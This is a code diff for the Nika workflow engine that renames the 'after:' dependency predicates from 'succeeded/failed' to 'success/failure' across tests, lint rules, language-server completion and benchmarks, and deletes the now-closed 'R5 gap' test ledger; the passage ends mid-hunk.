@@ -88,12 +87,7 @@ fn run_observed(workflow: &Path) -> (std::collections::BTreeMap<String, String>,
             statuses.insert(format!("{task}\u{0}output"), output.to_owned());
         }
     }
-    let text = format!(
-        "{}{}",
-        String::from_utf8_lossy(&out.stdout),
-        String::from_utf8_lossy(&out.stderr)
-    );
-    (statuses, out.status.success(), text)
+    (statuses, out.status.success())
 }
 
 #[test]
@@ -106,7 +100,6 @@ fn gate_matrix_cells_match_the_model_authored_expectations() {
     );
 
     let mut total = 0usize;
-    let mut r5_gapped = 0usize;
     let mut failures: Vec<String> = Vec::new();
     let mut dirs: Vec<PathBuf> = std::fs::read_dir(&gates)
         .expect("read gates dir")
@@ -123,41 +116,7 @@ fn gate_matrix_cells_match_the_model_authored_expectations() {
             .to_string_lossy()
             .to_string();
         let input = dir.join("input.nika.yaml");
-        let (observed, run_ok, text) = run_observed(&input);
-
-        // ── The R5 predicates gap (spec #118 · pc-light) ─────────────
-        // The pin's cells speak the RENAMED outcome-class spellings
-        // (`after: success·failure`) while the engine's closed set is
-        // still succeeded·failed (skipped·terminal are unchanged and
-        // parse today — they ride the normal verdict path). The ratchet
-        // is keyed on the RENAMED spellings exactly (never a bare
-        // `after:` sniff): a gapped cell that PASSES (the wave landed ·
-        // delete its row) or that refuses with anything OTHER than the
-        // unknown-predicate code (the divergence is deeper than the
-        // rename) reds the gate.
-        let cell = std::fs::read_to_string(&input).expect("cell input reads");
-        let carries_r5_spelling = cell.lines().any(|l| {
-            let t = l.trim_start();
-            !t.starts_with('#')
-                && (t.contains(": success") || t.contains(": failure"))
-                && !t.contains(": succeeded")
-                && !t.contains(": failed")
-        });
-        if carries_r5_spelling {
-            r5_gapped += 1;
-            if run_ok {
-                failures.push(format!(
-                    "{name}: PASSES but is R5-gapped — the predicates wave landed \
-                     · the engine speaks the outcome-class spellings · DELETE the ledger"
-                ));
-            } else if !text.contains("NIKA-DAG-005") {
-                failures.push(format!(
-                    "{name}: R5-gapped cell refuses with something OTHER than \
-                     NIKA-DAG-005 — deeper than the rename:\n{text}"
-                ));
-            }
-            continue;
-        }
+        let (observed, run_ok) = run_observed(&input);
 
         let expected: serde_json::Value = serde_json::from_str(
             &std::fs::read_to_string(dir.join("expected-run.json")).expect("expected-run.json"),
@@ -196,17 +155,10 @@ fn gate_matrix_cells_match_the_model_authored_expectations() {
 
     assert!(
         failures.is_empty(),
-        "{} of {total} matrix cells diverged ({r5_gapped} R5-gapped) ·\n{}",
+        "{} of {total} matrix cells diverged ·\n{}",
         failures.len(),
         failures.join("\n")
     );
     // The matrix floor: 35 cells + the always-pattern fixture.
     assert!(total >= 36, "only {total} cells walked — layout drift?");
-    // The R5 ledger can't silently shrink: every cell the pin spells
-    // with an `after:` must hit it (a renamed/removed cell is a layout
-    // drift, and a landed wave flips its cell to the loud row above).
-    assert_eq!(
-        r5_gapped, 36,
-        "R5 ledger drift — {r5_gapped} after:-carrying cells gapped vs 36 at the pin"
-    );
 }

--- a/crates/nika-cli/tests/resume_e2e.rs
+++ b/crates/nika-cli/tests/resume_e2e.rs
@@ -265,7 +265,7 @@ tasks:
     exec: { command: ["echo", "staged"] }
   approve:
     after:
-      prep: succeeded
+      prep: success
     invoke:
       tool: "nika:prompt"
       args: { mode: "input", message: "ship it?" }

--- a/crates/nika-cli/tests/run_verb.rs
+++ b/crates/nika-cli/tests/run_verb.rs
@@ -36,7 +36,7 @@ tasks:
     exec: { command: ["echo", "hello"] }
   after:
     after:
-      greet: succeeded
+      greet: success
     exec: { command: ["echo", "done"] }
 "#;
 
@@ -56,11 +56,11 @@ workflow:
 tasks:
   a:
     after:
-      b: succeeded
+      b: success
     exec: { command: ["true"] }
   b:
     after:
-      a: succeeded
+      a: success
     exec: { command: ["true"] }
 "#;
 
@@ -281,7 +281,7 @@ tasks:
     invoke: { tool: "nika:write", args: { path: "OUT", content: "spends before the crash" } }
   use:
     after:
-      first: succeeded
+      first: success
     invoke: { tool: "nika:write", args: { path: "OUT", content: "${{ inputs.needle }}" } }
 "#
     .replace("OUT", &out_path.display().to_string())

--- a/crates/nika-cli/tests/verbs_static.rs
+++ b/crates/nika-cli/tests/verbs_static.rs
@@ -37,7 +37,7 @@ tasks:
 
   fan:
     after:
-      gather: succeeded
+      gather: success
     for_each: ["a", "b", "c"]
     infer:
       prompt: "Classify · ${{ item }}"
@@ -47,14 +47,14 @@ tasks:
     with:
       gathered: ${{ tasks.gather.output }}
     after:
-      probe: succeeded
+      probe: success
     infer:
       prompt: "Summarize · ${{ with.gathered }}"
       max_tokens: 800
 
   notify:
     after:
-      think: succeeded
+      think: success
     when: ${{ const.source != '' }}
     exec:
       command: ["echo", "done"]
@@ -187,7 +187,7 @@ fn graph_mermaid_and_dot_derive_from_the_projection() {
 #[test]
 fn graph_refuses_a_dag_broken_file_with_exit_2() {
     // think depends on a task that doesn't exist → conformance fails.
-    let broken = WORKFLOW.replace("probe: succeeded", "ghost: succeeded");
+    let broken = WORKFLOW.replace("probe: success", "ghost: success");
     let path = fixture_path("graph-broken.nika.yaml", &broken);
     let out = graph::run(&path, GraphFormat::Json, PLAIN);
     assert_eq!(out.code, exit::FILE);
@@ -303,7 +303,7 @@ fn check_json_conformance_carries_severity_and_docs_url() {
     // The agent-loop wire: every conformance finding stamps its own
     // severity + per-code docs page (the rustc --explain move, machine
     // form). Consumers link the code without re-deriving anything.
-    let broken = WORKFLOW.replace("probe: succeeded", "ghost: succeeded");
+    let broken = WORKFLOW.replace("probe: success", "ghost: success");
     let path = fixture_path("check-severity.nika.yaml", &broken);
     let out = check::run(&path, true, false, None, PLAIN);
     let doc: serde_json::Value = serde_json::from_str(&out.text).expect("valid JSON");

--- a/crates/nika-dap/src/lib.rs
+++ b/crates/nika-dap/src/lib.rs
@@ -394,7 +394,7 @@ mod tests {
         let wf = dir.path().join("w.nika.yaml");
         std::fs::write(
             &wf,
-            "nika: v1\nworkflow:\n  id: journey\ntasks:\n  alpha:\n    exec:\n      command: [\"true\"]\n  beta:\n    after:\n      alpha: succeeded\n    exec:\n      command: [\"true\"]\n",
+            "nika: v1\nworkflow:\n  id: journey\ntasks:\n  alpha:\n    exec:\n      command: [\"true\"]\n  beta:\n    after:\n      alpha: success\n    exec:\n      command: [\"true\"]\n",
         )
         .expect("write wf");
         let journal = dir.path().join("run.ndjson");

--- a/crates/nika-dap/src/replay.rs
+++ b/crates/nika-dap/src/replay.rs
@@ -314,7 +314,7 @@ mod tests {
 
     use super::*;
 
-    const YAML: &str = "nika: v1\nworkflow:\n  id: demo\ntasks:\n  alpha:\n    exec:\n      command: [\"true\"]\n  beta:\n    after:\n      alpha: succeeded\n    exec:\n      command: [\"true\"]\n  gamma:\n    after:\n      beta: succeeded\n    exec:\n      command: [\"true\"]\n";
+    const YAML: &str = "nika: v1\nworkflow:\n  id: demo\ntasks:\n  alpha:\n    exec:\n      command: [\"true\"]\n  beta:\n    after:\n      alpha: success\n    exec:\n      command: [\"true\"]\n  gamma:\n    after:\n      beta: success\n    exec:\n      command: [\"true\"]\n";
 
     fn ev(seed: u8, kind: EventKind, fields: &[(&str, &str)]) -> Event {
         let mut e = Event::new(

--- a/crates/nika-display/src/snippet.rs
+++ b/crates/nika-display/src/snippet.rs
@@ -80,7 +80,7 @@ mod tests {
     use super::*;
 
     const YAML: &str =
-        "nika: v1\nworkflow:\n  id: demo\ntasks:\n  a:\n    after:\n      ghost: succeeded\n";
+        "nika: v1\nworkflow:\n  id: demo\ntasks:\n  a:\n    after:\n      ghost: success\n";
 
     fn span_of(needle: &str) -> ByteSpan {
         let start = YAML.find(needle).expect("needle present");
@@ -103,7 +103,7 @@ mod tests {
             "origin carries path:line:col:\n{out}"
         );
         assert!(
-            out.contains("ghost: succeeded"),
+            out.contains("ghost: success"),
             "offending line shown:\n{out}"
         );
         assert!(

--- a/crates/nika-graph/src/lib.rs
+++ b/crates/nika-graph/src/lib.rs
@@ -111,7 +111,7 @@ pub struct Edge {
     /// `failure-observation` · `control` · `recovery` (· `finally`
     /// reserved).
     pub kind: &'static str,
-    /// The `after:` predicate (`succeeded` · `failed` · `skipped` ·
+    /// The `after:` predicate (`success` · `failure` · `skipped` ·
     /// `terminal`) — control edges only.
     #[serde(skip_serializing_if = "Option::is_none")]
     pub predicate: Option<&'static str>,
@@ -319,7 +319,7 @@ mod tests {
     #[test]
     fn nodes_are_wave_ordered_regardless_of_authoring_order() {
         let g = doc(
-            "nika: v1\nworkflow:\n  id: w\ntasks:\n  d:\n    with:\n      b: \"${{ tasks.b.output }}\"\n      c: \"${{ tasks.c.output }}\"\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n  a:\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: succeeded }\n    exec: { command: [\"true\"] }\n",
+            "nika: v1\nworkflow:\n  id: w\ntasks:\n  d:\n    with:\n      b: \"${{ tasks.b.output }}\"\n      c: \"${{ tasks.c.output }}\"\n    exec: { command: [\"true\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n  a:\n    exec: { command: [\"true\"] }\n  c:\n    after: { a: success }\n    exec: { command: [\"true\"] }\n",
         );
         assert_eq!(g.graph_format, 2);
         let ids: Vec<&str> = g.nodes.iter().map(|n| n.id.as_str()).collect();

--- a/crates/nika-lints/src/native_first.rs
+++ b/crates/nika-lints/src/native_first.rs
@@ -86,7 +86,7 @@ mod tests {
         );
 
         let silent = lints_of(
-            "nika: v1\nworkflow:\n  id: build\ntasks:\n  test:\n    exec: { command: [\"cargo\", \"test\", \"--workspace\", \"--lib\"] }\n  nested:\n    after: { test: succeeded }\n    exec: { command: [\"nika\", \"run\", \"subroutine.nika.yaml\"] }\n",
+            "nika: v1\nworkflow:\n  id: build\ntasks:\n  test:\n    exec: { command: [\"cargo\", \"test\", \"--workspace\", \"--lib\"] }\n  nested:\n    after: { test: success }\n    exec: { command: [\"nika\", \"run\", \"subroutine.nika.yaml\"] }\n",
         );
         assert!(silent.is_empty(), "{silent:?}");
     }

--- a/crates/nika-lints/src/preference_rules/mod.rs
+++ b/crates/nika-lints/src/preference_rules/mod.rs
@@ -137,7 +137,7 @@ fn rule_008_interpolated_string_command(tasks: &[&RawTask], lints: &mut Vec<Lint
 /// `one-obvious-way/010` — an `after: {a: terminal}` beside a VALUE
 /// edge to the same producer is a non-tightening restatement: edges
 /// compose by intersection, and {success, skipped} ∩ terminal is the
-/// value edge alone (spec 03 §one obvious way). Tighten to `succeeded`
+/// value edge alone (spec 03 §one obvious way). Tighten to `success`
 /// or drop the entry.
 fn rule_010_non_tightening_after(tasks: &[&RawTask], lints: &mut Vec<Lint>) {
     use nika_schema::analyzer::edges::{EdgeKind, role_of_field, task_refs_in_value};
@@ -166,7 +166,7 @@ fn rule_010_non_tightening_after(tasks: &[&RawTask], lints: &mut Vec<Lint>) {
                         t = target.value
                     ),
                     format!(
-                        "drop the entry or tighten to `after: {{{t}: succeeded}}`",
+                        "drop the entry or tighten to `after: {{{t}: success}}`",
                         t = target.value
                     ),
                 ));
@@ -321,7 +321,7 @@ fn rule_002_skip_for_dependents(tasks: &[&RawTask], lints: &mut Vec<Lint>) {
         }
         let id = task.id.value.as_str();
         // A dependent ACKNOWLEDGES the possible skip when it tightens
-        // the gate (`after: {id: succeeded}` — skip cancels it) or its
+        // the gate (`after: {id: success}` — skip cancels it) or its
         // `when:` reads a binding bound to this producer (the null test
         // being the canonical form · spec 03 §gate algebra).
         let mut unguarded: Vec<&str> = Vec::new();
@@ -349,7 +349,7 @@ fn rule_002_skip_for_dependents(tasks: &[&RawTask], lints: &mut Vec<Lint>) {
                 p == id
                     && matches!(
                         kind,
-                        EdgeKind::Control(nika_schema::types::AfterPredicate::Succeeded)
+                        EdgeKind::Control(nika_schema::types::AfterPredicate::Success)
                     )
             });
             let when_reads_binding = when_expr(t).is_some_and(|expr| {
@@ -375,16 +375,16 @@ fn rule_002_skip_for_dependents(tasks: &[&RawTask], lints: &mut Vec<Lint>) {
                 unguarded.join(", ")
             ),
             format!(
-                "tighten the dependent's gate (`after: {{{id}: succeeded}}`) or test the \
+                "tighten the dependent's gate (`after: {{{id}: success}}`) or test the \
                  binding in its `when:` (`${{{{ with.<name> != null }}}}`)"
             ),
         ));
     }
 }
 
-/// 003 + 004 — failure-path tasks (`after: {a: failed}` · W2).
+/// 003 + 004 — failure-path tasks (`after: {a: failure}` · W2).
 ///
-/// 003 · an `after: {a: failed}` task whose body is STRUCTURALLY
+/// 003 · an `after: {a: failure}` task whose body is STRUCTURALLY
 /// IDENTICAL to `a` re-implements `retry:`.
 ///
 /// 004 · the same failure path around a pure value-producer
@@ -400,7 +400,7 @@ fn rule_003_004_failure_guarded_tasks(
         let checked: Vec<String> = task
             .after
             .iter()
-            .filter(|(_t, pred)| matches!(pred.value, nika_schema::types::AfterPredicate::Failed))
+            .filter(|(_t, pred)| matches!(pred.value, nika_schema::types::AfterPredicate::Failure))
             .map(|(t, _)| t.value.clone())
             .collect();
         let mut fired_003 = false;
@@ -414,7 +414,7 @@ fn rule_003_004_failure_guarded_tasks(
                     task.id.value.clone(),
                     task.id.span,
                     format!(
-                        "failure-path duplicate of `{dep}` — an `after: {{{dep}: failed}}` \
+                        "failure-path duplicate of `{dep}` — an `after: {{{dep}: failure}}` \
                          copy re-implements retry"
                     ),
                     format!("put `retry:` on `{dep}` — the ONE retry shape"),

--- a/crates/nika-lints/src/preference_rules/tests.rs
+++ b/crates/nika-lints/src/preference_rules/tests.rs
@@ -6,7 +6,7 @@ use nika_schema::{FileId, ParseMode, parse};
 use serde_json::{Value, json};
 
 // Fixtures speak W2 « the flow » — `depends_on:` is a dead form
-// (NIKA-SCHEMA parse error): a bare dep is `after: {x: succeeded}` ·
+// (NIKA-SCHEMA parse error): a bare dep is `after: {x: success}` ·
 // a data read is a `with:` binding consumed as `${{ with.<name> }}` ·
 // `when:` never references `tasks.*` (NIKA-VAR-021). The yaml scenarios
 // mirror the spec conformance corpus (`conformance/tests/lints/`).
@@ -180,7 +180,7 @@ fn rule_002_fires_for_an_unguarded_dependent() {
     // body→() and the on_error-skip match guard both silence the
     // expected single /002. `b` reads `a`'s VALUE through a `with:`
     // binding and acknowledges the possible skip neither way (no
-    // `after: {a: succeeded}` tightening · no `when:` over the binding).
+    // `after: {a: success}` tightening · no `when:` over the binding).
     let yaml = "\
 nika: v1
 workflow:
@@ -206,7 +206,7 @@ tasks:
 
 #[test]
 fn rule_002_silent_when_the_dependent_tightens_the_gate() {
-    // Acknowledgement arm 1 — `after: {a: succeeded}` cancels the
+    // Acknowledgement arm 1 — `after: {a: success}` cancels the
     // dependent on skip, so the changed contract is decided. The
     // tightened-check mutant (dropping the Control(Succeeded) match)
     // turns this into a spurious /002.
@@ -221,7 +221,7 @@ tasks:
   b:
     with:
       data: \"${{ tasks.a.output }}\"
-    after: { a: succeeded }
+    after: { a: success }
     exec: { command: [\"./b.sh\", \"${{ with.data }}\"] }
 ";
     assert!(
@@ -284,7 +284,7 @@ tasks:
 #[test]
 fn rule_003_fires_on_a_structural_duplicate() {
     // `==`→`!=` on the fingerprint compare: /003 fires when the
-    // `after: {build: failed}` task's action fingerprint EQUALS the
+    // `after: {build: failure}` task's action fingerprint EQUALS the
     // guarded producer's. The mutant inverts it: identical actions ⇒ no
     // /003 (and the exec body is not a value-producer ⇒ no /004 either).
     let yaml = "\
@@ -295,7 +295,7 @@ tasks:
   build:
     exec: { command: [\"./build.sh\"] }
   rebuild:
-    after: { build: failed }
+    after: { build: failure }
     exec: { command: [\"./build.sh\"] }
 ";
     let three = lints_for(yaml, "one-obvious-way/003");
@@ -317,7 +317,7 @@ tasks:
       tool: \"nika:fetch\"
       args: { url: \"https://example.com/data\" }
   a_retry:
-    after: { a: failed }
+    after: { a: failure }
     invoke:
       tool: \"nika:fetch\"
       args: { url: \"https://example.com/data\" }
@@ -334,7 +334,7 @@ tasks:
 #[test]
 fn rule_003_silent_when_bodies_differ() {
     // Real failure-path WORK (a notification · a different tool) is the
-    // legitimate use of `after: {a: failed}` — neither /003 (bodies
+    // legitimate use of `after: {a: failure}` — neither /003 (bodies
     // differ) nor /004 (not a mere value) may fire.
     let yaml = "\
 nika: v1
@@ -346,7 +346,7 @@ tasks:
       tool: \"nika:fetch\"
       args: { url: \"https://example.com/data\" }
   report:
-    after: { a: failed }
+    after: { a: failure }
     invoke:
       tool: \"nika:notify\"
       args: { channel: webhook, target: \"https://hooks.example.com\", message: \"a failed\" }
@@ -363,7 +363,7 @@ tasks:
 
 #[test]
 fn rule_004_fires_on_an_echo_fallback_task() {
-    // A template-free argv `echo` behind `after: {a: failed}` is a mere
+    // A template-free argv `echo` behind `after: {a: failure}` is a mere
     // fallback VALUE — the route belongs in `a`'s `on_error: recover:`.
     let yaml = "\
 nika: v1
@@ -373,7 +373,7 @@ tasks:
   a:
     exec: { command: [\"./a.sh\"] }
   fallback:
-    after: { a: failed }
+    after: { a: failure }
     exec: { command: [\"echo\", \"default-value\"] }
 ";
     let four = lints_for(yaml, "one-obvious-way/004");
@@ -395,7 +395,7 @@ tasks:
       tool: \"nika:fetch\"
       args: { url: \"https://example.com/data\" }
   fallback:
-    after: { a: failed }
+    after: { a: failure }
     invoke:
       tool: \"nika:jq\"
       args: { input: { count: 0 }, expression: \".\" }
@@ -424,7 +424,7 @@ tasks:
       tool: \"nika:fetch\"
       args: { url: \"https://primary.example.com\" }
   mirror:
-    after: { a: failed }
+    after: { a: failure }
     invoke:
       tool: \"nika:fetch\"
       args: { url: \"https://mirror.example.com\" }
@@ -453,7 +453,7 @@ tasks:
   a:
     exec: { command: [\"echo\", \"hi\"] }
   b:
-    after: { a: succeeded }
+    after: { a: success }
     invoke: { tool: \"nika:jq\", args: { filter: \".x\" } }
 ";
     assert!(
@@ -598,7 +598,7 @@ tasks:
     assert_eq!(ten[0].task_id, "b");
     assert!(ten[0].message.contains("terminal"), "{}", ten[0].message);
     assert!(
-        ten[0].suggestion.contains("succeeded"),
+        ten[0].suggestion.contains("success"),
         "{}",
         ten[0].suggestion
     );
@@ -631,7 +631,7 @@ tasks:
 
 #[test]
 fn rule_010_silent_on_a_tightening_after() {
-    // `after: {a: succeeded}` beside the value edge TIGHTENS the gate
+    // `after: {a: success}` beside the value edge TIGHTENS the gate
     // (skip no longer admits) — the canonical acknowledgement, never
     // flagged. Kills a would-be any-predicate mutant of the Terminal
     // match.
@@ -645,7 +645,7 @@ tasks:
   b:
     with:
       data: \"${{ tasks.a.output }}\"
-    after: { a: succeeded }
+    after: { a: success }
     exec: { command: [\"./b.sh\", \"${{ with.data }}\"] }
 ";
     assert!(
@@ -771,7 +771,7 @@ tasks:
 fn rule_007_fires_on_three_sequential_exec_shards() {
     // body→(), deleting the `Some(&[j])` arm of `next` (no chain edges ⇒
     // every chain is length 1 ⇒ never fires), and the `chain.len() < 3`
-    // swaps: three single-producer exec shards (`after: {…: succeeded}`
+    // swaps: three single-producer exec shards (`after: {…: success}`
     // links) differing in one token fire exactly one /007 on the head.
     let yaml = "\
 nika: v1
@@ -781,10 +781,10 @@ tasks:
   shard1:
     exec: { command: [\"./process.sh\", \"part1\"] }
   shard2:
-    after: { shard1: succeeded }
+    after: { shard1: success }
     exec: { command: [\"./process.sh\", \"part2\"] }
   shard3:
-    after: { shard2: succeeded }
+    after: { shard2: success }
     exec: { command: [\"./process.sh\", \"part3\"] }
 ";
     let seven = lints_for(yaml, "one-obvious-way/007");
@@ -805,10 +805,10 @@ tasks:
   page1:
     invoke: { tool: \"nika:fetch\", args: { url: \"https://example.com/page/1\" } }
   page2:
-    after: { page1: succeeded }
+    after: { page1: success }
     invoke: { tool: \"nika:fetch\", args: { url: \"https://example.com/page/2\" } }
   page3:
-    after: { page2: succeeded }
+    after: { page2: success }
     invoke: { tool: \"nika:fetch\", args: { url: \"https://example.com/page/3\" } }
 ";
     let seven = lints_for(yaml, "one-obvious-way/007");
@@ -830,7 +830,7 @@ tasks:
   shard1:
     exec: { command: [\"./process.sh\", \"part1\"] }
   shard2:
-    after: { shard1: succeeded }
+    after: { shard1: success }
     exec: { command: [\"./process.sh\", \"part2\"] }
 ";
     assert!(
@@ -852,10 +852,10 @@ tasks:
   fetch:
     exec: { command: [\"./fetch.sh\"] }
   parse:
-    after: { fetch: succeeded }
+    after: { fetch: success }
     exec: { command: [\"./parse.sh\", \"--strict\", \"input.json\"] }
   report:
-    after: { parse: succeeded }
+    after: { parse: success }
     exec: { command: [\"./report.sh\"] }
 ";
     assert!(

--- a/crates/nika-lints/src/preference_rules/tests.rs
+++ b/crates/nika-lints/src/preference_rules/tests.rs
@@ -599,8 +599,7 @@ tasks:
     assert!(ten[0].message.contains("terminal"), "{}", ten[0].message);
     assert!(
         ten[0].suggestion.contains("success"),
-        "{}",
-        ten[0].suggestion
+        "the /010 suggestion names the respelling"
     );
 }
 

--- a/crates/nika-lints/tests/lints_one_obvious_way.rs
+++ b/crates/nika-lints/tests/lints_one_obvious_way.rs
@@ -53,7 +53,6 @@ fn lint_fixture_corpus() {
 
     let mut failures: Vec<String> = Vec::new();
     let mut total = 0_usize;
-    let mut r5_gapped = 0_usize;
 
     for dir in fixture_dirs(&root) {
         total += 1;
@@ -64,17 +63,10 @@ fn lint_fixture_corpus() {
             .to_string();
         let yaml = std::fs::read_to_string(dir.join("input.yaml")).expect("read input.yaml");
 
-        // ── The R5 predicates gap (spec #118 · pc-light) ─────────────
-        // The pin's corpus carries the RENAMED outcome-class spellings
-        // (`after: success·failure`) while the engine's closed set is
-        // still succeeded·failed (skipped·terminal are unchanged and
-        // parse today). Same loud ratchet as the gate-matrix ledger,
-        // keyed on the refusal's own payload — exact, never a sniff:
-        // a fixture refusing `success`/`failure` with the
-        // unknown-predicate class is the rename and nothing deeper; any
-        // other refusal reds the gate. When the wave lands the fixtures
-        // rejoin the normal verdict path and the pinned count drops
-        // (the assert below fires — delete the ledger).
+        // The R5 predicates gap CLOSED (spec #118 · the engine speaks
+        // the outcome-class spellings) — the 12 success/failure-spelled
+        // fixtures rejoined this normal verdict path the day the rename
+        // landed, and the ledger deleted itself per the ratchet.
         let expected: ExpectedLints = serde_json::from_str(
             &std::fs::read_to_string(dir.join("expected-lints.json"))
                 .expect("read expected-lints.json"),
@@ -83,17 +75,8 @@ fn lint_fixture_corpus() {
 
         let got = match try_lint(&yaml) {
             Ok(lints) => lints,
-            Err(nika_schema::SchemaError::UnknownAfterPredicate { predicate, .. })
-                if predicate == "success" || predicate == "failure" =>
-            {
-                r5_gapped += 1;
-                continue;
-            }
             Err(e) => {
-                failures.push(format!(
-                    "{label} · refuses with something OTHER than the R5 rename — \
-                     deeper than the spelling: {e}"
-                ));
+                failures.push(format!("{label} · refuses to parse: {e}"));
                 continue;
             }
         };
@@ -118,18 +101,11 @@ fn lint_fixture_corpus() {
 
     assert!(
         failures.is_empty(),
-        "{} of {total} lint fixtures FAILED ({r5_gapped} R5-gapped) ·\n\n{}",
+        "{} of {total} lint fixtures FAILED ·\n\n{}",
         failures.len(),
         failures.join("\n\n")
     );
     assert!(total >= 24, "only {total} lint fixtures — corpus drift?");
-    // The R5 ledger can't silently shrink: every success/failure-spelled
-    // fixture at the pin must hit it (a landed wave drops the count to
-    // zero — this assert then demands the ledger's deletion).
-    assert_eq!(
-        r5_gapped, 12,
-        "R5 ledger drift — {r5_gapped} success/failure-spelled lint fixtures gapped vs 12 at the pin"
-    );
 }
 
 #[test]
@@ -158,7 +134,7 @@ tasks:
     assert_eq!(l.rule, "one-obvious-way/010");
     assert!(!l.message.is_empty());
     assert!(!l.suggestion.is_empty());
-    assert!(l.suggestion.contains("succeeded"), "{}", l.suggestion);
+    assert!(l.suggestion.contains("success"), "{}", l.suggestion);
 }
 
 // ── rule 008 · interpolated string command → use the array form ──────────

--- a/crates/nika-lints/tests/lints_one_obvious_way.rs
+++ b/crates/nika-lints/tests/lints_one_obvious_way.rs
@@ -134,7 +134,10 @@ tasks:
     assert_eq!(l.rule, "one-obvious-way/010");
     assert!(!l.message.is_empty());
     assert!(!l.suggestion.is_empty());
-    assert!(l.suggestion.contains("success"), "{}", l.suggestion);
+    assert!(
+        l.suggestion.contains("success"),
+        "the /010 suggestion names the respelling"
+    );
 }
 
 // ── rule 008 · interpolated string command → use the array form ──────────

--- a/crates/nika-lsp/benches/refonte_lsp_baseline.rs
+++ b/crates/nika-lsp/benches/refonte_lsp_baseline.rs
@@ -59,10 +59,7 @@ fn workflow(topology: &str, n: usize) -> String {
         };
         s.push_str(&format!("  t{i}:\n"));
         if !deps.is_empty() {
-            let rest: Vec<String> = deps[1..]
-                .iter()
-                .map(|d| format!("t{d}: succeeded"))
-                .collect();
+            let rest: Vec<String> = deps[1..].iter().map(|d| format!("t{d}: success")).collect();
             if !rest.is_empty() {
                 s.push_str(&format!("    after: {{ {} }}\n", rest.join(", ")));
             }

--- a/crates/nika-lsp/src/analysis/code_action.rs
+++ b/crates/nika-lsp/src/analysis/code_action.rs
@@ -214,7 +214,7 @@ mod tests {
     /// quickfix whose edit slices exactly the offending token.
     #[test]
     fn an_unknown_dependency_offers_the_did_you_mean_rename() {
-        let text = "nika: v1\nworkflow:\n  id: t\ntasks:\n  gather:\n    exec: { command: [\"true\"] }\n  think:\n    after: { gathr: succeeded }\n    exec: { command: [\"true\"] }\n";
+        let text = "nika: v1\nworkflow:\n  id: t\ntasks:\n  gather:\n    exec: { command: [\"true\"] }\n  think:\n    after: { gathr: success }\n    exec: { command: [\"true\"] }\n";
         let acts = actions(text);
         assert_eq!(acts.len(), 1, "one typed rename");
         let edit = first_edit(&acts[0]);
@@ -249,7 +249,7 @@ mod tests {
     /// The lightbulb only lights where the finding lives.
     #[test]
     fn actions_off_the_requested_range_stay_silent() {
-        let text = "nika: v1\nworkflow:\n  id: t\ntasks:\n  gather:\n    exec: { command: [\"true\"] }\n  think:\n    after: { gathr: succeeded }\n    exec: { command: [\"true\"] }\n";
+        let text = "nika: v1\nworkflow:\n  id: t\ntasks:\n  gather:\n    exec: { command: [\"true\"] }\n  think:\n    after: { gathr: success }\n    exec: { command: [\"true\"] }\n";
         let top = Range {
             start: lsp_types::Position {
                 line: 0,

--- a/crates/nika-lsp/src/analysis/completion.rs
+++ b/crates/nika-lsp/src/analysis/completion.rs
@@ -274,8 +274,8 @@ fn after_lane_items(
                     label: (*p).to_owned(),
                     kind: Some(CompletionItemKind::ENUM_MEMBER),
                     detail: Some(match *p {
-                        "succeeded" => "admits on success".to_owned(),
-                        "failed" => "admits on failure".to_owned(),
+                        "success" => "admits on success".to_owned(),
+                        "failure" => "admits on failure".to_owned(),
                         "skipped" => "admits on skipped".to_owned(),
                         _ => "admits on any settled state — incl. cancelled".to_owned(),
                     }),

--- a/crates/nika-lsp/src/analysis/completion/tests.rs
+++ b/crates/nika-lsp/src/analysis/completion/tests.rs
@@ -259,7 +259,7 @@ fn a_parseable_doc_carries_the_verb_detail_in_task_refs() {
     // so each id carries its verb in the detail (`task (exec)`) — the
     // `!wf.tasks.is_empty()` guard + the label/kind/detail fields of the
     // parse-path CompletionItem.
-    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: succeeded }\n    exec: { command: [\"y\"] }\noutputs:\n  first: \"${{ tasks.a.output }}\"\n";
+    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    after: { a: success }\n    exec: { command: [\"y\"] }\noutputs:\n  first: \"${{ tasks.a.output }}\"\n";
     let cursor = text.find("${{ tasks.").expect("island") + "${{ tasks.".len();
     let items = completion(text, cursor);
     assert_eq!(
@@ -306,7 +306,7 @@ fn after_value_offers_the_closed_predicate_set() {
     let items = completion(text, text.len());
     assert_eq!(
         labels(&items),
-        vec!["succeeded", "failed", "skipped", "terminal"],
+        vec!["success", "failure", "skipped", "terminal"],
         "the closed predicate set, spec order"
     );
     assert!(
@@ -802,7 +802,7 @@ fn island_secrets_and_env_offer_declared_names() {
 /// island offers the PARENT alone (the only readable task there).
 #[test]
 fn with_and_on_finally_islands_offer_the_boundary_sets() {
-    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    with:\n      article: \"${{ tasks.a.output }}\"\n    exec: { command: [\"x\"] }\n  c:\n    after: { a: succeeded }\n    exec: { command: [\"x\"] }\n  d:\n    after: { b: succeeded, c: succeeded }\n    exec: { command: [\"x\"] }\n";
+    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  a:\n    exec: { command: [\"x\"] }\n  b:\n    with:\n      article: \"${{ tasks.a.output }}\"\n    exec: { command: [\"x\"] }\n  c:\n    after: { a: success }\n    exec: { command: [\"x\"] }\n  d:\n    after: { b: success, c: success }\n    exec: { command: [\"x\"] }\n";
     // cursor mid-island inside task b's `with:` value (document parses)
     let cursor = text.find("${{ tasks.").expect("island") + "${{ tasks.".len();
     let got = labels(&completion(text, cursor));
@@ -824,7 +824,7 @@ fn with_and_on_finally_islands_offer_the_boundary_sets() {
 /// whole, so the parse path carries the verb detail.
 #[test]
 fn recover_island_offers_the_dag004_legal_set() {
-    let text = "nika: v1\nworkflow:\n  id: w\ntasks:\n  cached:\n    exec: { command: [\"echo\", \"fallback\"] }\n  live:\n    exec:\n      command: [\"false\"]\n    on_error:\n      recover: \"${{ tasks.cached.output }}\"\n  downstream:\n    after: { live: succeeded }\n    exec: { command: [\"x\"] }\n";
